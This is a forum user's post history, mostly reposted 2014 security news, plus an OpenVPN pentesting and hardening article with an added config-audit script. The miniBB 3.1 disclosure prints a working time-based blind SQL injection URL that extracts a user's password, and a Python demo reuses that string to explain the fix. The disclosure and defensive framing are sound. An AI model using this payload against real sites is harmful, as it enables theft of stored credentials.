Everything posted by Aerosol
-
Introduction

A VPN (Virtual Private Network) enables connections between clients and servers from multiple different internal networks across a public network (like the Internet) as if the nodes were located in the same private network. Since the communication is transferred across the public network, it must be properly encrypted to prevent eavesdropping. When a user is connected to the VPN, he/she can access the extended network services the same way as if they were located within the private network. There are two types of VPNs: the remote-access VPN, used to connect a device to a network, and the site-to-site VPN, used when connecting two networks together. A VPN can be used for multiple different scenarios, like allowing employees to securely access the company’s internal network even when outside the office (remote-access VPN), connecting two remote offices together into one internal private network (site-to-site VPN), etc.

There are different implementations of the VPN protocols, including the ones listed below (summarized after [1]):

- Internet Protocol Security (IPsec): a widely used VPN implementation that uses IPv4 and operates on layer 2, where the packet is encapsulated into an IPsec header and sent to its endpoint.
- Transport Layer Security (SSL/TLS): another widely used VPN implementation that’s most often incorporated with OpenVPN, which we’ll take a look at in this article. OpenVPN is an SSL-based VPN that uses SSL certificates to encrypt the data in transit.
- Datagram Transport Layer Security (DTLS)
- Microsoft Point-to-Point Encryption (MPPE)
- Microsoft Secure Socket Tunneling Protocol (SSTP)
- Secure Shell (SSH) VPN

Pentesting OpenVPN

Depending on the type of VPN we’re checking during our penetration test, there are different procedures that will drive our testing. Regardless of the type of VPN being used, the basic steps to pentest the VPN are the following:

- Reconnaissance: the first step is determining which type of VPN we’re dealing with in order to plan how to proceed with the attack. We can do that with a simple port scan by using an open-source tool like Nmap or any other tool with port scanning capabilities. The purpose is determining the type of VPN implementation we’re dealing with, which is often bound to a default port. Usually the following ports are involved with VPN services: UDP 500 (IPsec), TCP 1723, TCP 443 (SSL VPN) and UDP 1194 (OpenVPN).
- Exploitation: this phase depends directly on the type of VPN we’re dealing with. When testing a network-based IPsec VPN, we can rely on the ike-scan program to perform the testing. First, we can identify the VPN product and its version and search for related vulnerabilities online; there are vulnerabilities for different vendors like Cisco or Check Point regarding the VPN services that we can use to our advantage. When dealing with an SSL VPN, we could theoretically use the tools used for SSL pentesting, and in some cases we can do that, but most tools out there support the TCP protocol only, where UDP isn’t supported. One of the most critical vulnerabilities this year has been the Heartbleed vulnerability, which affects the OpenSSL library that OpenVPN is also using. Therefore, if OpenVPN is using a vulnerable version of the OpenSSL library, the service can be exploited by malicious attackers and the whole server can be compromised. This is why we have to take every security precaution in order to protect our network.
- Credentials: when the connection with a VPN server is initiated, a client must present a valid passphrase or a certificate to prove that it’s authorized to use the server. If the VPN server is only using passphrases, we should instead configure it to use certificates together with the passphrases to improve security.

I’ve often seen a VPN server using only user credentials to authenticate to the VPN server; not to mention some of the user passwords were quite simple and easy to guess within a few bruteforcing attempts. That is certainly something we have to keep in mind when conducting a penetration test of the VPN server or when setting up such a server for our own network.

Recommendations for Hardening OpenVPN

To harden the OpenVPN security, we have to edit its configuration file, usually passed to the OpenVPN daemon by the --config command-line option. If we use the “ps -ef” command and grep the OpenVPN processes, we can see where the configuration file is located and view it accordingly.

Table 1: Security configuration options in openvpn.conf

Conclusion

It goes without saying that when a hacker stumbles upon an open VPN port, he will most likely check it for different security holes. Therefore, we have to properly protect our VPN server in order to secure our users and our whole internal network. If an attacker is able to compromise the VPN service, he can get access to our whole network. Some of the administrators might argue that the VPN service is very secure by itself and needs no additional protection, but such predictions have been proved incorrect in the past. One such vulnerability was found in April 2014, named the Heartbleed vulnerability, which can be used to dump memory from the OpenVPN daemon process. Therefore, if an attacker is able to determine that a VPN service is running on some port, he might be able to dump arbitrary memory from the server or possibly even take control of the server. Once such a vulnerability is discovered, we must patch it as soon as possible, but a properly hardened service should give an attacker as little access to the server as possible.

Imagine a new devastating vulnerability being found in OpenVPN/OpenSSL in the future; a secure service running under an unprivileged account might be just what you need to protect yourself from being a victim of a cyber attack.

References

[1] Virtual private network, https://en.wikipedia.org/wiki/Virtual_private_network.
[2] Hardening OpenVPN Security, https://openvpn.net/index.php/open-source/documentation/howto.html#security.

Source
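As an added example of what the configuration review behind Table 1 amounts to in practice, the following script audits an OpenVPN server config for the hardening directives reference [2] recommends: tls-auth in front of the TLS handshake, dropping root with user/group and chroot, persist-key/persist-tun so the deprivileged daemon can restart, and requiring a client certificate rather than a password alone. This is my code, not the article's and not OpenVPN's; the two configs inside are constructed samples, the assumption that Table 1 listed exactly these directives is mine, and verify-client-cert is the OpenVPN 2.4 spelling of the older client-cert-not-required toggle.

```python
"""Audit an OpenVPN server config for hardening directives.
Added example: not code from the article or the OpenVPN project.
The two configs below are constructed samples, not real deployments."""

# Directives a hardened server config should carry, with the reason.
# The selection follows the "Hardening OpenVPN Security" section of the
# OpenVPN HOWTO (reference [2]); that Table 1 listed these is an assumption.
HARDENING = {
    "tls-auth": "HMAC on the control channel: unsigned packets are dropped "
                "before OpenSSL parses them (limits exposure to bugs like Heartbleed)",
    "user": "drop root after initialisation, e.g. 'user nobody'",
    "group": "drop the group after initialisation, e.g. 'group nogroup'",
    "chroot": "jail the daemon in a directory after initialisation",
    "persist-key": "keep keys in memory so the deprivileged daemon can restart "
                   "without re-reading root-owned files",
    "persist-tun": "keep the tun/tap device open across restarts without root",
    "remote-cert-tls": "'remote-cert-tls client' rejects peers presenting a server certificate",
}

# Constructed sample: password-only clients, daemon stays root.
WEAK_CONF = """\
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
# password-only logins: no client certificate is checked
client-cert-not-required
auth-user-pass-verify /etc/openvpn/check-pass.sh via-env
"""

# Constructed sample: certificate plus password, privileges dropped.
HARDENED_CONF = """\
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
tls-auth ta.key 0
remote-cert-tls client
; certificate AND password: the password is a second factor, not the only one
verify-client-cert require
auth-user-pass-verify /etc/openvpn/check-pass.sh via-env
user nobody
group nogroup
chroot /var/empty
persist-key
persist-tun
"""


def parse_config(text):
    """Return {directive: [args, ...]}. Lines starting with '#' or ';' are
    comments; the first word of every other line is the directive."""
    parsed = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        directive, *args = line.split()
        parsed.setdefault(directive, []).append(args)
    return parsed


def audit(text):
    """Return the hardening directives that are absent and the settings that
    actively weaken the server (password-only clients, daemon staying root)."""
    cfg = parse_config(text)
    missing = [d for d in HARDENING if d not in cfg]
    weak = []
    if "client-cert-not-required" in cfg:
        weak.append("client-cert-not-required: clients authenticate with a password only")
    for args in cfg.get("verify-client-cert", []):
        if args and args[0] != "require":
            weak.append(f"verify-client-cert {args[0]}: client certificates are not mandatory")
    for args in cfg.get("user", []):
        if args and args[0] == "root":
            weak.append("user root: the daemon keeps root after initialisation")
    return {"missing": missing, "weak": weak}


def report(text):
    """Human-readable audit, one line per finding."""
    result = audit(text)
    lines = [f"MISSING {d}: {HARDENING[d]}" for d in result["missing"]]
    lines += [f"WEAK    {w}" for w in result["weak"]]
    return "\n".join(lines) or "no findings"


if __name__ == "__main__":
    print("== weak config ==\n" + report(WEAK_CONF))
    print("== hardened config ==\n" + report(HARDENED_CONF))
```

Point it at the file you found with "ps -ef" by reading it into a string and calling report(); a server that needs a password but no certificate shows up as a WEAK finding, which is exactly the password-only setup the post warns about, and a missing user/group/chroot line means the daemon still runs as root when the next OpenSSL bug lands.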
-
Developers running the open source Git code-repository software and tools, like GitHub, on Mac OS X and Windows computers are strongly advised to install a security update that patches a major security vulnerability in Git clients that allows an attacker to hijack end-user computers. The critical Git vulnerability affects all versions of the official Git client and all the related software that interacts with Git repositories, including GitHub for Windows and Mac OS X, according to a GitHub advisory published Thursday.

HOW GIT BUG WORKS

The vulnerability allows an attacker to execute remote code on a client’s computer when the client software accesses Git repositories. The GitHub engineering team gave a detailed explanation on how attackers might exploit the vulnerability:

PATCH RELEASED

However, the advisory didn’t state whether the vulnerability is being or has been exploited in the wild by hackers, but it confirmed that GitHub for Windows and GitHub for Mac are both affected and should be updated as soon as possible.

GITHUB REPOSITORIES ARE SAFE

Developers using GitHub’s client for Windows or Mac can download Git version 2.2.1, a maintenance release that includes a security fix for a critical vulnerability, and it requires a client update to be fully addressed. The security update also includes new releases with the same security fix for older versions of the Git command-line client. Since github.com verifies and blocks malicious content during its verification process, repositories on github.com are protected. But it is not guaranteed that other sites hosting repositories provide the same security measures, so all Git users are recommended to upgrade immediately.

DOWNLOAD NOW

Check out the Git version 2.2.1 release for further information on the security fixes. Updated versions of GitHub for Windows are available here and GitHub for Mac are available here for immediate download.

Git is a revision control system, and GitHub is a hosting service for Git repositories; both are widely used to collaborate on open-source projects and for proprietary software that different companies build and maintain.

Source
-
Security researchers have discovered a massive security flaw that could let hackers and cybercriminals listen to private phone calls and read text messages on a potentially vast scale, no matter whether the cellular networks use the latest and most advanced encryption available. The critical flaw lies in the global telecom network known as Signaling System 7, which multiple phone carriers across the world, including AT&T and Verizon, use to route calls, texts and other services to each other. The vulnerability has been discovered by German researchers who will present their findings at a hacker conference in Hamburg later this month.

NUMBER OF SECURITY FLAWS IN SS7

SS7, or Signaling System Number 7, is a protocol suite used by most telecommunications operators throughout the world to communicate with one another when directing calls, texts and Internet data. It allows cell phone carriers to collect location information from cell phone towers and share it with each other. A United States carrier will find its customer no matter whether he or she travels to any other country. According to the security researchers, the outdated infrastructure of SS7 makes it very easy for hackers to attack, as it is loaded with serious security vulnerabilities which can lead to huge invasions of the privacy of the billions of cellular customers worldwide.

BACKDOOR OPEN FOR HACKERS

So far, the extent of the flaws exploited by hackers has not been revealed, but it is believed that using the flaws hackers can locate users or redirect users' calls to themselves or anywhere in the world before forwarding them to the intended recipient, listen to calls as they happen, and record hundreds of encrypted calls and texts at a time for later decryption. No matter how strong or advanced the encryption the carriers are using (for example, AT&T and Verizon use 3G and 4G networks for calls, messages and texts sent between people within the same network), the use of the old and insecure SS7 for sending data across networks leaves the backdoor open for hackers. Not just this: the use of the SS7 protocol also creates the potential to defraud users and cellular carriers, according to the researchers.

ACLU – STOP USING TELEPHONE SERVICE, BUT WAIT!! IS THAT POSSIBLE?

The American Civil Liberties Union (ACLU) has also warned people against using their handset in light of the breaches. Soghoian also believes that security agencies – like the United States' NSA and British security agency GCHQ – could be using these flaws. "Many of the big intelligence agencies probably have teams that do nothing but SS7 research and exploitation. They've likely sat on these things and quietly exploited them," he said. However, the poor security of the SS7 protocol is not hidden from people and it's not new at all; just three months ago we reported How a Cell Phone User Can be Secretly Tracked Across the Globe. But in an era where each and every person cares about the privacy and security of their data, things like this really publicize exactly how big this threat really is and make many worried about its consequences.

Source
-
# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps

1. Description

preg_match() only checks if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside the regexp).

File: bb_func_unsub.php

$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
$allowUnsub=FALSE;
$chkCode=FALSE;
if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
//trying to unsubscribe directly from email
$chkField='email_code';
$chkVal=$_GET['code'];
$userCondition=TRUE;
$chkCode=TRUE;
}
else{
//manual unsubsribe
$chkField='user_id';
$chkVal=$user_id;
$userCondition=($usrid==$user_id);
}
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

http://security.szurek.pl/minibb-31-blind-sql-injection.html

2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

This SQL will check if the first password character of user ID=1 is c. If yes, it will sleep 5 seconds.

3. Solution:

http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

Source
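As an added illustration (in Python rather than miniBB's PHP; my code, not the advisory's or miniBB's), the following shows why the unanchored preg_match() lets the proof-of-concept value through, what the anchored check does instead, and why the real fix is to stop splicing $chkVal into the SQL text at all. The subscriptions table, its columns and its one row are constructed for this example; the PoC string is the one from the advisory.

```python
"""Why the miniBB unsubscribe check passes the PoC payload, and the two fixes.
Added example, not code from the advisory or from miniBB. The table name,
columns and rows are constructed for this illustration."""
import re
import sqlite3

# The exact value from the advisory's proof of concept (written for MySQL).
PAYLOAD = ("test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) "
           "FROM minibbtable_users WHERE user_id = 1 AND username != '")


def code_accepted_vulnerable(code):
    """Mirrors preg_match("#[a-zA-Z0-9]+#", $code): any alphanumeric run
    anywhere in the value is enough, so the leading 'test' satisfies it."""
    return re.search(r"[a-zA-Z0-9]+", code) is not None


def code_accepted_fixed(code):
    """Anchored check (^...$ in PCRE terms): the whole value must be
    alphanumeric, so quotes and spaces are rejected."""
    return re.fullmatch(r"[a-zA-Z0-9]+", code) is not None


def build_query_concat(topic, code):
    """The vulnerable shape: the user value is spliced into the SQL text.
    A quote inside 'code' closes the literal and the rest is parsed as SQL."""
    return (f"SELECT id, user_id FROM subscriptions "
            f"WHERE topic_id = {int(topic)} AND email_code = '{code}'")


def setup_db():
    """In-memory stand-in for the subscriptions table (constructed data;
    the real miniBB table name is $Ts in the code above)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscriptions "
                 "(id INTEGER, user_id INTEGER, topic_id INTEGER, email_code TEXT)")
    conn.execute("INSERT INTO subscriptions VALUES (7, 1, 1, 'abc123')")
    return conn


def lookup_parameterized(conn, topic, code):
    """The query-side fix: placeholders, so 'code' travels as data and can
    never be parsed as SQL, whatever characters it contains."""
    return conn.execute(
        "SELECT id, user_id FROM subscriptions WHERE topic_id = ? AND email_code = ?",
        (topic, code),
    ).fetchall()


def concat_query_error(conn, code):
    """Run the concatenated query and return the database's error text, or
    None if it ran. SQLite has no IF()/SLEEP() and no minibbtable_users, so
    the MySQL-oriented PoC is rejected at prepare time; the error proves the
    attacker's text reached the SQL parser instead of staying a literal."""
    try:
        conn.execute(build_query_concat(1, code))
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable regex accepts PoC:", code_accepted_vulnerable(PAYLOAD))
    print("anchored regex accepts PoC:  ", code_accepted_fixed(PAYLOAD))
    print("concatenated SQL:", build_query_concat(1, PAYLOAD))
    print("database says:", concat_query_error(db, PAYLOAD))
    print("parameterized lookup of PoC:", lookup_parameterized(db, 1, PAYLOAD))
```

Anchoring the regular expression closes this particular hole, but it only works because an email_code happens to be alphanumeric; the parameterized lookup is the fix that survives the next field that is allowed to contain a quote.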
-
Samy Kamkar has a special talent for turning seemingly innocuous things into rather terrifying attack tools. First it was an inexpensive drone that Kamkar turned into a flying hacking platform with his Skyjack research, and now it’s a $20 USB microcontroller that Kamkar has loaded with code that can install a backdoor on a target machine in a few seconds and hand control of it to the attacker.

Kamkar has been working on the new project for some time, looking for a way to install the backdoor without needing to use the mouse and keyboard. The solution he came up with is elegant, fast and effective. By using code that can emulate the keyboard and the mouse and evade security protections such as local firewalls, Kamkar found a method to install his backdoor in just a couple of seconds and keep it hidden on the machine. He loaded the code onto an inexpensive Teensy USB microcontroller. Kamkar said the stickiest problem with the whole thing was figuring out how to move various windows around on the screen without the mouse.

“The fun applications are when you can mount an attack pretty simply,” Kamkar said in an interview. “In general, it’s a pretty simple attack. Figuring out how to move things took the most time.”

The USBdriveby attack Kamkar devised is somewhat similar to the work done by Karsten Nohl and Jacob Lell on the BadUSB attack. But Kamkar said he had done nearly all of the work on his code before Nohl and Lell disclosed their findings at Black Hat this summer.

“Karsten’s attack is much more sophisticated. He’s rewriting the flash memory on the USB,” Kamkar said. “The way he’s adjusting the network preferences is by emulating a network device.”

In both cases, the attack takes advantage of the trust that computers have in any USB device that’s inserted. Kamkar’s USBdriveby attack can be executed in a matter of seconds and would be quite difficult for a typical user to detect once it’s executed.

In a demo video, Kamkar runs the attack on OS X, but he said the code, which he’s released on GitHub, can be modified easily to run on a Windows or Linux machine. The attack inserts a backdoor on the target machine and also overwrites the DNS settings so that the attacker can then spoof various destinations, such as Facebook or an online banking site, and collect usernames and passwords. The backdoor also goes into the cron queue, so that it runs at specified intervals.

“In the video, I slow it down quite a bit, but it could be done in a few seconds. The terminal backdoor could be done in a second. You don’t want to send more than sixty characters a second. To an average user, I don’t think they’d find it. You could look in the cron tab and find the backdoor. But if someone modifies it, then maybe not,” he said. “A forensics person would find it, but I don’t know if I’d even notice if you did it to my machine.”

Kamkar is hopeful that other researchers will look at his code and build on it, looking for other uses for it.

“It would be cool if people came up with different attack vectors, maybe have it read an address book or something, especially if they can escalate privileges,” he said. “A lot of people don’t think that it will work if they’re not logged in as an admin. But all I need to do is plant this, and it’s still listening. So if you go in as a normal user and escalate privileges to admin, then I have that.”

Source
-
Security researchers are making use of quantum physics to create fraud-proof credit cards. Called Quantum-Secure Authentication (QSA), the technology means hackers cannot determine what the information is. It centres on single particles of light, or photons, and their ability to encode data, and exploits a property of photons that allows them to effectively be in multiple places at once, a phenomenon described in quantum physics.

"We experimentally demonstrate quantum-secure authentication (QSA) of a classical multiple-scattering key. The key is authenticated by illuminating it with a light pulse containing fewer photons than spatial degrees of freedom and verifying the spatial shape of the reflected light," explained the researchers in the journal Optica.

Quantum-physical principles forbid an attacker from being able to discern the incident light pulse, so that they cannot emulate the key by digitally constructing the expected optical response, even if all information about the key is publicly known. The researchers explained that QSA uses a key that cannot be copied due to "technological limitations" and is also secure against digital emulation. It also does not depend on secrecy of stored data, nor upon unproven mathematical assumptions, being relatively simple to implement with current technology, the security experts claimed.

Malwarebytes's head of malware intelligence, Adam Kujawa, said that while the database could be hacked and the pairs could be stolen, the keys would not be in a form that could be digitally reproduced and would therefore be virtually useless to the attacker. "The problem is that even if the attacker were to obtain a correct challenge response, for a single challenge, it would be impossible for them to recreate that response in a way that would authenticate due to the properties of Quantum Physics," Kujawa said. "In addition, they would need to know that the challenge response would be used again in a lock that has dynamically generated keyholes."

Kujawa explained that the amount of effort required to ensure that any key would make it through authentication for a single QSA would require numerous tries and access to both the client and server; something like that would throw flags faster than a working key could be calculated. "Authentication at that point would be impossible," he added, suggesting that this technology could mean a future of truly secure data.

Source
-
The latest evolution of the online bank account raiding Trojan ZeuS is the webcam-spying Chthonic malware, according to researchers. Chthonic infects Windows PCs, and allows criminals to connect to the compromised PC remotely and command it to carry out fraudulent transactions. The software nasty is targeting customers of more than 150 banks and 20 payment systems in 15 countries. Financial institutions in the UK, Spain, the US, Russia, Japan and Italy are among the most heavily targeted banks. Security researchers at Kaspersky Lab say the theftware is an evolution of ZeuS.

Chthonic’s main weapon is web injectors: it inserts its own malicious JavaScript code and images into an online bank's pages when fetched by the web browser on an owned Windows PC. These modifications intercept the victim’s phone number, one-time passwords and PINs, and any other sensitive information typed in by the user, and send it off to fraudsters. In the case of one of the Japanese banks targeted, Chthonic was able to hide the bank’s warnings about malware, and instead inject a script that allows attackers to carry out various transactions using the victim’s account. Elsewhere, affected customers of Russian banks are greeted by a completely fraudulent banking site as soon as they enter their login details. The trojan creates an iFrame with a counterfeit copy of the website that has the same size as the original window. Fortunately, many code fragments used by Chthonic to perform web injections can no longer be used, because banks have changed the structure of their pages and in some cases the domains as well.

Victims are infected through web links or by email attachments carrying a booby-trapped document that exploits a bug in Microsoft's Word software to execute malicious code. “The attachment contains a specially crafted RTF document, designed to exploit the CVE-2014-1761 vulnerability in Microsoft Office products,” Kaspersky Lab explains. Once downloaded and running, the malicious code, which contains an encrypted configuration file, injects itself into an msiexec process, and a number of malicious modules are unpacked and installed on the machine. Analysis is ongoing, but so far Kaspersky Lab researchers have discovered modules that can collect system information, steal saved passwords, log keystrokes, enable remote access, and record video and sound through any installed web camera and microphone.

“The discovery of Chthonic confirms that the ZeuS Trojan is still actively evolving,” said Yury Namestnikov, senior malware analyst at Kaspersky Lab and one of the researchers who investigated the threat. “Malware writers are making full use of the latest techniques, helped considerably by the leak of the ZeuS source code.”

“Chthonic is the next phase in the evolution of ZeuS. It uses ZeuS AES encryption, a virtual machine similar to that used by ZeusVM and KINS, and the Andromeda downloader – to target ever more financial institutions and innocent customers in ever more sophisticated ways,” he added. Namestnikov warned that more new variants of ZeuS are likely. More technical details on Chthonic can be found in a post on Kaspersky’s official Securelist blog here.

Source
-
A dispute has arisen about the seriousness of a vulnerability in Linux, dubbed "Grinch", that supposedly creates a privilege escalation risk. The flaw resides in the Linux authorisation system, which can unintentionally allow privilege escalation, granting a user “root”, or full administrative, access. “With full root access, an attacker would be able to completely control a system, including the ability to install programs, read data, and use the machine as a launching point for compromising other systems,” Alert Logic warns. Alert Logic warns that the “grinch” [1] bug impacts all Linux platforms, including mobile devices. Alert Logic admits it has NOT seen any exploits that harness this vulnerability.

Other security firms believe Alert Logic is overstating the risk, which Trend Micro characterises as “limited”:

The scope of this vulnerability is very limited. Grinch is not remotely exploitable; it requires that an attacker have physical access to the server they want to attack. In addition, the attacker must already have access to an account in the wheel group (i.e., already have elevated privileges as local administrators), polkit [toolkit for privilege authorisation] must be installed, and the PackageKit package management system must be in use. The barriers to exploitation are significant; in a very real way, to exploit this flaw you must already have very high levels of access, making exploiting this “vulnerability” unnecessary.

SANS describes it as more a “common overly permissive configuration of many Linux systems”. Red Hat dismisses the flaw entirely as “expected behavior”. An independent researcher first posted about the vulnerability – which he called PackageKit Privilege Escalation – almost a month ago before Alert Logic picked up on the threat and publicised it.

Bootnote

[1] The bug was named after the famous Dr Seuss character, since it supposedly carries the potential to ruin the season of network administrators.

Source
-
US software giant Microsoft is suing alleged scammers who phone people pretending to represent the firm and offer bogus technology support. The callers ask to take over a home computer and demand money to fix it. Some then install viruses as well. The software company said it had received more than 65,000 complaints about tech support scams since May. It is taking legal action against several firms it accuses of misusing its name in such cases.

Fake ads

The scam has been around for decades, with callers peddling useless security software and tricking people into spending hundreds of pounds (or dollars) to solve non-existent computer problems. Increasingly, the bogus technicians are gaining access to people's computers remotely. From there they can also steal personal and financial information and install malware. In some cases people are tricked into signing up for support via fake web ads. Others receive a direct telephone call from a technician claiming to represent Microsoft. Microsoft has warned that scammers are likely to be active over the Christmas period. "The holiday season is a popular time for scammers as more people engage in online activities, including shopping, donating to charity and searching for travel deals," it said.

Older victims

Older people needed to be particularly vigilant, it said. "Tech support scammers don't discriminate; they will go after anyone, but not surprisingly senior citizens have been among the most vulnerable." The US Federal Trade Commission filed a legal case in Florida last month against a company that used adverts to scare people into believing their computer had a virus and then sell them allegedly worthless services. In the UK, Trading Standards has recently taken legal action against a man from Luton who hired people at an Indian call centre to falsely tell people their computers had a serious problem. Mohammed Khalid Jamil was given a four-month suspended jail sentence and ordered to pay £5,665 compensation and £13,929 in prosecution costs.

Microsoft has issued tips to help users avoid falling for such scams. It says:

- Ask if there is a fee or subscription for the services. If there is, hang up.
- Never give control of your computer to a third party unless you can confirm it is a legitimate representative of a computer support team at a company of which you are already a customer.
- Take the caller's information down and immediately report it to your local authorities.
- Never provide your credit card or financial information to someone claiming to be from Microsoft tech support.

Source
-
There are probably some from RO as well... the purpose? To see what others are doing.
-
The United States government is expected to attribute the damaging and embarrassing hack of Sony Pictures Entertainment to the government of North Korea. Various mainstream media outlets quoting anonymous government sources said North Korea is “centrally involved” in the attack, which NBC News said was carried out by hackers outside the isolated country on the orders of the North Korean government. It’s unknown what evidence the U.S. government has linking the Sony hack to North Korea, nor how said evidence was obtained. It’s likely the U.S. won’t give much in the way of details in this regard without sharing insight into what are likely classified activities, security experts said. Another big unknown is how the U.S. will respond against a nation already under heavy economic sanctions. The Washington Post reports the White House has not determined a course of action, which will delay a public announcement.

The public narrative in terms of motivation has been the Sony-produced comedy movie The Interview, which depicts a plot to assassinate North Korean leader Kim Jong Un. A North Korean spokesman called the movie a “blatant act of terrorism and war,” leading to initial speculation the country was behind the attack on Sony, which yesterday canceled the movie’s scheduled Christmas Day release. Sony’s announcement came after leading theater chains said they would not run the movie after threats from the Guardians of Peace hacker group claiming responsibility for the hacks, which said that it would generate a 9/11-style response against the premiere and theaters showing the movie.

The movie, however, could be a massive red herring. The attackers not only allegedly made off with terabytes of data that included private emails from top executives and celebrities, but also intellectual property ranging from unreleased movies made available for download, to scripts of upcoming potential blockbusters put online, in addition to employees’ personal information. They also covered their tracks by unleashing wiper malware that overwrote hard drives company-wide, malware that was also used in the DarkSeoul attacks in South Korea that were attributed to the North, as well as the Saudi Aramco Shamoon attacks attributed to Iran. Could this just be a rogue country demonstrating its capabilities and proving that it can operate on a somewhat level playing field with a world power?

“It’s not about a movie or even Sony, at all,” wrote Immunity CEO and former NSA scientist Dave Aitel on the Daily Dave mailing list. “When you build a nuclear program, you have to explode at least one warhead so that other countries see that you can do it. The same is true with Cyber.”

Aitel was one of the first to publicly theorize that North Korea was behind the Sony hack and likened it to Iran’s alleged involvement in the Shamoon attacks that destroyed 30,000 workstations at the Saudi state-run oil manufacturer. “Iran did this exact same near-mortal blow to Saudi Aramco, as a way of demonstrating that they could and would,” Aitel said. “That’s what just happened to Sony, but they didn’t see it in time, and didn’t realize they were going to have to fold. If you recognize the signature of this kind of nation-state attack, it is not hard to see ahead of time what is going to happen.

“Clearly, not all hacking (even very impactful hacking) by random hacker groups is war/terrorism,” Aitel continued. “But when a nation state decides to take out a business in another country, it’s hard for our policy team to find another word for it.”

While attribution is difficult in any hack, analysis of the Destover wiper malware has been conclusive in linking it to the three most public, destructive attacks on record. Kaspersky Lab senior researcher Kurt Baumgartner published a report on Dec. 4 analyzing the similarities in the Shamoon, DarkSeoul and Sony hacks. Across the three attacks, Baumgartner notes the use of commercially available Eldos RawDisk driver files (Shamoon and Destover), that wiper drivers are maintained in the dropper’s resource section (Shamoon, Destover), and that disk data and the master boot record are overwritten with encoded political messages (Shamoon, DarkSeoul).

“In all three cases: Shamoon, DarkSeoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own,” Baumgartner wrote in a report published on Securelist. “All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter.”

Cisco’s Talos research team published its own report yesterday, warning future victims that backup is an essential protective measure in such attacks. The Talos report dives into the technical aspects of wiper malware and how to detect it.

Source
-
More than 12 million devices running an embedded webserver called RomPager are vulnerable to a simple attack that could give a hacker man-in-the-middle position on traffic going to and from home routers from just about every leading manufacturer. Mostly ISP-owned residential gateways manufactured by D-Link, Huawei, TP-Link, ZTE, Zyxel and several others are currently exposed. Researchers at Check Point Software Technologies reported the flaw they’ve called Misfortune Cookie to all of the affected vendors and manufacturers, and most have responded that they will push new firmware and patches in short order. The problem with embedded device security is that, with consumer-owned gear especially, it’s up to the device owner to find and flash new firmware, leaving most of the devices in question vulnerable indefinitely.

In the case of the RomPager vulnerability, an attacker need only send a single packet containing a malicious HTTP cookie to exploit the flaw. Such an exploit would corrupt memory on the device and allow an attacker to remotely gain administrative access to the device.

“We hope this is a game-changing wake-up call,” said Shahar Tal, malware and vulnerability research manager with Check Point. “Certainly in terms of numbers, I don’t remember a vulnerability released that had 12 million endpoints online since maybe Conficker in 2008. This is really, really bad and the incredibly slow update propagation chain makes it worse.”

Tal said the vulnerable code was written in 2002 and given to chipset makers bundled in a software development kit (SDK). This SDK was given to manufacturers who used it when building their respective firmware; ISPs, Tal said, also used the same SDK to prepare custom firmware used in consumer residential devices.

“The vulnerable code is from 2002 and was actually fixed in 2005 [by AllegroSoft, makers of RomPager] and yet still did not make it into consumer devices,” Tal said. “It’s present in device firmware manufactured in 2014 that we downloaded last month. This is an industry problem; something is wrong.”

Tal said Check Point conducted Internet scans that show the 12 million devices exposed online in 189 countries. In some of those countries, Tal said, vulnerability rates hover around 10 percent, and in one country half of its Internet users are at risk. “Even when people become aware of this, I don’t expect updated firmware to be deployed in 189 countries,” Tal said. “This will be with us for months and years to come.”

That means that vulnerable home routers are at risk to remote attacks that put not only Internet traffic at risk, but also other devices on a local network such as printers. “The implications of these risks mean more than just a privacy violation – they also set the stage for further attacks, such as installing malware on devices and making permanent configuration changes,” Check Point wrote in an analysis published today. “This WAN-to-LAN free-crossing is also bypassing any firewall or isolation functionality previously provided by your gateway and breaks common threat models. For example, an attacker can try to access your home webcam (potentially using default credentials) or extract data from your business NAS backup drive.”

Tal said Check Point is not aware of any exploits of this issue, but assumes that researchers and black hats will soon begin pinging Shodan and doing Google searches looking for vulnerable devices. “This is very easy to exploit once you figure out the program internals,” Tal said. “We are assuming that some researchers will do that in upcoming days and we hope vendors react as fast as possible to get consumers protected.” Some vendors, which Tal would not name, have already shared beta versions of upgraded firmware with Check Point, and Check Point has confirmed the issue as patched in those cases.
“Everyone is aware that embedded devices are insecure, but we haven’t had one game-changing event that crosses boundaries and makes the industry understand this,” Tal said. “This one is definitely worth the attention and needs fixing.” Source
-
Document Title:
===============
E-Journal CMS (ID) - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1380

Release Date:
=============
2014-12-17

Vulnerability Laboratory ID (VL-ID):
====================================
1380

Common Vulnerability Scoring System:
====================================
7

Product & Service Introduction:
===============================
http://simlitabmas.dikti.go.id/ejournal/

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the Indonesian E-Journal web-application.

Vulnerability Disclosure Timeline:
==================================
2013-12-17: Public Disclosure

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
1.1
